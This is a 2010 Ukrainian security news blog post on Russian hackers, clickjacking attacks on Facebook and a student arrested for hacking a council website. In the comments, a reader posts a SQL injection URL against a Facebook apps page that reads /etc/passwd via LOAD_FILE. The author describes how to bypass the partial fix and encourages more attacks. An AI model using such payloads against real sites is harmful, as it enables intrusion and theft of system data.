Новини: російські хакери, атаки в Facebook та студент-хакер

22:44 31.07.2010

Пропоную вашій увазі добірку цікавих новин на тему безпеки.

За повідомленням www.runewsweek.ru, в статті Кібер-імперія зла розповідається про російських хакерів (а також згадуються деякі українські діячі, зокрема ті, що входять до числа найбільших в світі спамерів).

Захід знайшов нову глобальну загрозу. Місце “Аль-Каїди” зайняла всесвітня мережа російськомовних хакерів.

За повідомленням hackzona.com.ua, Sophos попереджає про нові атаки в Facebook. Антивірусна компанія Sophos в минулому місяці попередила про те, що кілька сотень тисяч користувачів соціальної мережі Facebook стали жертвами атаки типу Сlickjacking або так званого “угону кліків”.

За повідомленням www.crime-research.ru, у Вінницькій області СБУ піймала студента-хакера. Співробітники Управління Служби безпеки України у Вінницькій області затримали студента, що шляхом комп’ютерного взлому незаконно втрутився в роботу інтернет-сайта Могилів-Подільського міської ради.

СБУ встановило, що 20-літній студент одного з вінницьких вузів замінив логін і пароль у системі керування сайтом міськради, що дало можливість іншим користувачам мережі Інтернет одержати доступ до деяких його розділів.


5 відповідей на “Новини: російські хакери, атаки в Facebook та студент-хакер”

  1. spayder каже:

    j4f
    http://apps.facebook.com/myhotdeals/promo.php?promoid=150+AND+1=2+UnIoN+aLL+SeLeCt+1,2,3,4,5,LOAD_FILE(’/etc/passwd’),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30–

  2. MustLive каже:

    spayder

    Молодець. Ти сам знайшов дірку, я сподіваюся :-) .

    XSS на Facebook я знаходив (на основному домені facebook.com), але SQLi (нехай і на домені apps.facebook.com) - це круто. І це несерйозно для Facebook мати такі дірки.

    Зазначу, що вони спробували частково пофіксити дірку - прибрали можливість використовувати одинарні лапки разом зі слешами для вказання шляху (блокують). Але це обходиться (методом з 16-м записом, або методом з char). Хоча, як я перевірив, одинарні лапки працюють, просто це в них періодично блокування виникає (з обхідними методами також іноді виникає блокування, але рідше). Так що виправити дірку вони поки ще не спромоглися.

  3. MustLive каже:

    Як я виявив, це одна з уразливостей нещодавно знайдених Inj3ct0r team на Facebook ;-) . Вони молодці, вже друге знаходять серйозні дірки на Facebook.

  4. spayder каже:

    так саме вони.
    взагалі в аппс на фейсі багато скулій.
    декілька разів на них натикався.

  5. MustLive каже:

    Так вони молодці.

    взагалі в аппс на фейсі багато скулій.
    декілька разів на них натикався.

    Так може ти знайдеш там свою нову SQLi і похакаєш Facebook як це двічі зробили хлопці з Inj3ct0r team :-) .

    Схоже, що на apps хостяться скрипти різних розробників додатків під Facebook, тому й дірок там багато. Компанії варто більше слідкувати за безпекою і також перевіряти всі скрипти від сторонніх розробників.

Leave a Reply

You must be logged in to post a comment.